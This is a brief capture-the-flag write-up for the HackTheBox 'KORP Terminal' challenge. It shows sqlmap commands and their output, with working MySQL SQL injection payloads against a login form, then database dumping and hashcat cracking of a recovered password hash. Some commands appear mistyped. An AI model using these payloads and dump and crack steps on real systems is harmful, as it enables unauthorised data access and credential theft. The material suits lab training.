HackTheBox KORP Terminal Challenge
https://app.hackthebox.com/challenges/647
Description
Your faction must infiltrate the KORP™ terminal and gain access to the Legionaries’ privileged information and find out more about the organizers of the Fray. The terminal login screen is protected by state-of-the-art encryption and security protocols.
Exploitation
sqlmap -u "http://94.237.59.180:40492/" --method POST --data "username=a&password=a" --batch --ignore-code 401
---
Parameter: username (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: username=a' RLIKE (SELECT (CASE WHEN (5665=5665) THEN 0x61 ELSE 0x28 END))-- Isul&password=a
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=a' OR (SELECT 8955 FROM(SELECT COUNT(*),CONCAT(0x7178716271,(SELECT (ELT(8955=8955,1))),0x717a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pzFe&password=a
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=a' AND (SELECT 1571 FROM (SELECT(SLEEP(5)))MEYL)-- abGQ&password=a
---
sqlmap -u "http://94.237.59.180:40492/" --method POST --data "username=a&password=a" --batch --ignore-code 401 --dbs
sqlmap -u "http://94.237.59.180:40492/" --method POST --data "username=a&password=a" --batch --ignore-code 401 -D korp_terminal --tables
sqlmap -u "http://94.237.59.180:40492/" --method POST --data "username=a&password=a" --batch --ignore-code 401 -dump
Brute Force the Hash
echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat 3200 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat /tmp/hash.txt --show
rm -rf /tmp/hash.txt
this yelds password123 so admin:password123
Summary
KORP Terminal: exploit the SQL injection, extract the needed data, and reach the flag.